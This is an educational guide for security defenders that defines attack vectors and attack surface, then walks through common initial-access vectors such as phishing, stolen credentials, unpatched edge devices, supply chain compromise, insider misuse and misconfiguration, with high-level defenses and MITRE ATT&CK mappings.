What Is an Attack Vector? Types and Defenses

In the 2026 Verizon Data Breach Investigations Report, exploitation of a software vulnerability was the way into 31 percent of breaches, overtaking stolen credentials for the first time in nineteen years of the report. Phishing accounted for 16 percent. Credential abuse, last year's leader, dropped to 13 percent. Three numbers, three different doors into the same building.

Each of those doors is an attack vector. The vector is not the malware, the ransom note, or the stolen database. It is the specific path the attacker used to get the first foothold, the thing that turned an outsider into someone running code or holding a valid session inside your environment. Name the vector and you know where to put the control.

This guide defines the term precisely, separates it from the attack surface it gets confused with, and works through the vectors that actually show up in incident reports: phishing and social engineering, stolen credentials, unpatched vulnerabilities, malware, supply chain compromise, insider misuse, and misconfiguration. For each, how it is exploited and how a blue team shuts it down. It is written for SOC analysts, threat hunters, and DFIR responders who have to trace an intrusion back to its entry point.

What is an attack vector?

An attack vector is the method or path an adversary uses to gain unauthorized access to a system, network, or account. It is the entry technique, the specific way the attacker crossed from outside your trust boundary to inside it: a phishing email that harvested a password, an internet-facing server with an unpatched flaw, a contractor's reused credential, a poisoned software update.

Two attacks with completely different goals can share a vector, and one goal can be reached through many vectors. Ransomware is not a vector. It is an objective, the thing the attacker does after they are in. The vector is how they got in to deliver it: a phished credential, an exposed RDP service, a vulnerable VPN appliance. When a post-incident report says "the threat actor gained initial access via," the words that follow are the vector.

That framing matters because defense is organized around vectors, not outcomes. You cannot buy a control that stops "data theft" in the abstract. You can require phishing-resistant multi-factor authentication, patch the internet-facing application, and alert on a service account logging in from a new country. Each of those closes or monitors a specific vector. The list of known vectors is your list of doors to lock.

In MITRE ATT&CK terms, attack vectors map to the Initial Access tactic (TA0001). The techniques under it are the catalog of vectors with IDs you can write detections against: Phishing (T1566), Valid Accounts (T1078), Exploit Public-Facing Application (T1190), and more. ATT&CK is currently at version 19.1, and Initial Access is the first tactic for a reason: it is where the intrusion you are trying to prevent actually begins.

Attack vector vs. attack surface

These two terms get used interchangeably, and they should not be. The distinction is simple once you see it, and it changes how you talk about exposure.

The attack surface is the sum of all the points where an attacker could try to get in. NIST defines it as the set of points on the boundary of a system where an attacker can try to enter, cause an effect on, or extract data from that system. Every internet-facing service, every user account, every API endpoint, every employee who can be phished, every third-party integration. The surface is the total exposed area.

An attack vector is one specific path across that surface. It is the route actually taken or available, not the whole field of possibilities. If the attack surface is every door and window on the building, a vector is the one unlocked back door the burglar used.

The practical link between them: every vector is a slice of the surface, so shrinking the surface removes vectors wholesale. Decommission a forgotten internet-facing server and you delete every vector that ran through it at once. This is why attack surface management and vector-level hardening are the same program viewed at two zoom levels. Surface reduction is strategic and cuts categories of risk; vector hardening is tactical and closes the specific paths attackers are using right now.

The common attack vectors

The vectors below are the ones that dominate real breach data. Most intrusions start with one of them. They are not exotic. The recurring lesson of every annual breach report is that attackers use the cheapest door that works.

Phishing and social engineering

Phishing tricks a person into handing over a credential, running an attachment, or approving an action. It remains one of the top vectors because it targets the user, not the technology, and the user is reachable from anywhere. The 2025 IBM Cost of a Data Breach Report found phishing was the single most common initial vector, behind 16 percent of breaches, and the 2026 Verizon DBIR attributes 62 percent of breaches to a human element somewhere in the chain.

How it is exploited: a spear-phishing email impersonates a vendor or executive and links to a credential-harvesting page, or carries a malicious attachment. Variants include vishing (voice), smishing (SMS), and MFA-fatigue or push-bombing attacks that wear down a user into approving a login. Attackers increasingly use AI to draft fluent, targeted lures at scale.

How it is defended: phishing-resistant MFA (FIDO2 hardware keys, not SMS codes) removes the value of a harvested password. Email security that detects lookalike domains and detonates attachments in a sandbox catches delivery. User reporting, with a one-click report button that feeds the SOC, turns the workforce into a sensor. Detection-side, alert on impossible-travel logins, new-device sign-ins, and MFA push spikes.

Stolen and compromised credentials

A valid credential is the quietest vector there is. The attacker does not exploit anything. They log in. There is no malware to detect and no exploit to block, which is why credential-based intrusions routinely dwell the longest before discovery.

How it is exploited: credentials come from phishing, prior breach dumps replayed in credential stuffing, infostealer malware that scrapes saved passwords and session cookies, brute-force against exposed services, or simple purchase on criminal markets. Once in, the attacker abuses Valid Accounts (T1078) and often looks indistinguishable from the legitimate user.

How it is defended: MFA everywhere, prioritizing phishing-resistant factors on privileged and internet-facing access. Kill standing privilege with just-in-time elevation. Monitor for the behavioral tells a stolen login leaves: a service account interactively logging in, access from a new geography, logins outside normal hours, or a sudden spike in authentication failures preceding a success.

Unpatched vulnerabilities

Exploiting a public-facing flaw is now the leading initial-access vector in the Verizon data, up from 20 to 31 percent of breaches and roughly a 55 percent year-over-year rise. The pattern is consistent: a critical CVE drops in a widely deployed edge device (a VPN gateway, a file-transfer appliance, a firewall), a proof-of-concept follows within days, and mass exploitation hits the organizations that have not patched.

How it is exploited: the attacker scans the internet for a vulnerable version, sends a crafted request that triggers the flaw, and gets code execution or an authentication bypass with no user interaction required. This maps to Exploit Public-Facing Application (T1190). Edge appliances are the favored target because they sit at the boundary, often lack endpoint agents, and are slow to patch.

How it is defended: a vulnerability management program that prioritizes by real-world exploitation, not just CVSS score, using signals like CISA's Known Exploited Vulnerabilities catalog. Shrink the exposure: take services off the public internet, put them behind a VPN or identity-aware proxy, and inventory what is actually reachable. Where you cannot patch immediately, apply virtual patching at the WAF and watch the asset closely.

Malware

Malware is both a vector and a payload depending on where it sits in the intrusion. As a vector, it is the malicious code that establishes the initial foothold: a trojanized installer, a macro-laden document, a drive-by download from a compromised site.

How it is exploited: the user is induced to run the file, or a vulnerability is used to drop it. Modern variants lean on fileless techniques that live in memory and abuse legitimate tools (PowerShell, WMI, signed binaries) to avoid writing detectable artifacts to disk. Loaders and infostealers are the common first-stage payloads, pulling down the real tooling once they have a foothold.

How it is defended: endpoint detection and response (EDR) that watches behavior, not just file signatures, since the fileless and living-off-the-land variants leave no static signature. Application allowlisting to stop unapproved binaries. Disable Office macros from the internet by default. Network monitoring for the command-and-control beaconing that follows a successful install.

Supply chain compromise

A software supply chain attack reaches a target through software or a service the target already trusts. The attacker compromises a vendor, a build pipeline, an open-source package, or a managed service provider, and the malicious code rides in through a legitimate, signed channel.

How it is exploited: a poisoned dependency pulled from a package registry, a backdoored update to widely deployed software, or a compromised MSP whose remote-management tooling reaches every customer at once. The defining feature is that the malicious artifact arrives trusted, so it bypasses controls that key on provenance.

How it is defended: maintain a software bill of materials (SBOM) so you know what you actually run and can react when a component is flagged. Pin and verify dependencies. Apply least privilege and segmentation to vendor and MSP access so a compromised partner cannot reach your whole estate. Monitor third-party integrations for anomalous behavior the same way you watch internal accounts.

Insider threats

An insider already has legitimate access, which makes this vector hard to distinguish from normal work. The insider can be malicious (a disgruntled employee, a planted operative) or negligent (someone who mishandles data or falls for a lure). Either way the access starts authorized.

How it is exploited: a departing employee copies a customer database, an administrator abuses privilege to exfiltrate data, or a careless user emails sensitive files to a personal account. Because the access is legitimate, there is no exploit and often no alert unless you are watching the right behavior.

How it is defended: least privilege so each person can reach only what their role needs, which caps the blast radius. Data loss prevention on egress paths. Behavioral analytics that baseline normal activity per user and flag deviations: mass file access, off-hours bulk downloads, use of unsanctioned transfer channels. Tightened monitoring during the high-risk window around terminations.

Misconfiguration

Misconfiguration is the self-inflicted vector. No attacker skill is required because the defender left the door open: a cloud storage bucket set to public, a database exposed to the internet with no authentication, an over-permissioned identity role, a default credential never changed.

How it is exploited: automated scanners crawl the internet continuously for exposed services and open buckets. A misconfigured resource is often found within minutes of going live. There is no exploit chain to detect because the configuration itself grants the access. This is the dominant vector in cloud breaches, where a single permissive policy can expose everything behind it.

How it is defended: cloud security posture management (CSPM) to continuously scan for and flag risky configurations against a baseline. Infrastructure as code with policy-as-code guardrails so misconfigurations are caught before deployment. Block public access at the account level by default. Regular configuration audits and least-privilege identity reviews.

Top attack vectors at a glance

Two patterns cut across the table. First, identity is the connective tissue: stolen credentials, insider misuse, and many misconfigurations all resolve to "an attacker held a valid identity they should not have," which is why identity monitoring catches more than any single signature. Second, the cheapest vectors win. Attackers prefer logging in over breaking in, and prefer an unpatched edge device over a custom exploit. Defense follows the same economics: close the easy doors first.

How blue teams use the attack vector model

Thinking in vectors is not academic. It is how a SOC turns a pile of alerts and an asset inventory into a defensible priority list.

Initial-access analysis in incident response. The first question in any investigation is "how did they get in?" Pinning the vector scopes the whole response. A phished credential means hunting for everything that session touched and forcing a password and token reset. An exploited edge appliance means assuming the box is fully compromised and checking what else it could reach. The vector dictates containment.

Detection coverage mapping. Plot your detections against the common vectors and the gaps show up as empty rows. A team with strong endpoint coverage but no detection for anomalous logins is blind to the credential vector, which is exactly where quiet intrusions live. Mapping to ATT&CK Initial Access techniques makes the audit concrete.

Threat-informed prioritization. Cyber threat intelligence tells you which vectors the groups targeting your sector actually use. If the relevant actors favor exploitation of a specific appliance class you run, that vector jumps the patch queue ahead of a higher-CVSS flaw on something not exposed. Vectors let you spend finite effort where the real risk is.

Attack surface reduction. Vector analysis feeds back into shrinking the surface. Every incident that traces to a forgotten internet-facing service is a prompt to inventory and decommission the rest before they become the next vector. The cheapest vector to defend is the one you removed.

The fastest way to internalize this is to work real intrusions and label the entry point on each. Tracing an attack back to its vector, then deciding which control would have closed it, is the same loop a SOC analyst runs every day. Practicing on realistic attacks builds the instinct to spot the door before the attacker does.

The bottom line

An attack vector is the path an adversary takes to gain initial access, and it is the unit defense is actually organized around. Name the vector and you know which control closes it. The attack surface is the aggregate of every possible vector; shrinking it deletes vectors wholesale, while hardening individual vectors closes the routes attackers are using now.

The breach data is consistent year to year: attackers use the cheapest door that works, which today means exploiting unpatched edge services and logging in with valid credentials more than deploying novel malware. The defender's job is to inventory the doors, lock the easy ones first, and watch the ones that have to stay open. The way to make that instinctive is to work real intrusions and trace each one back to where it started.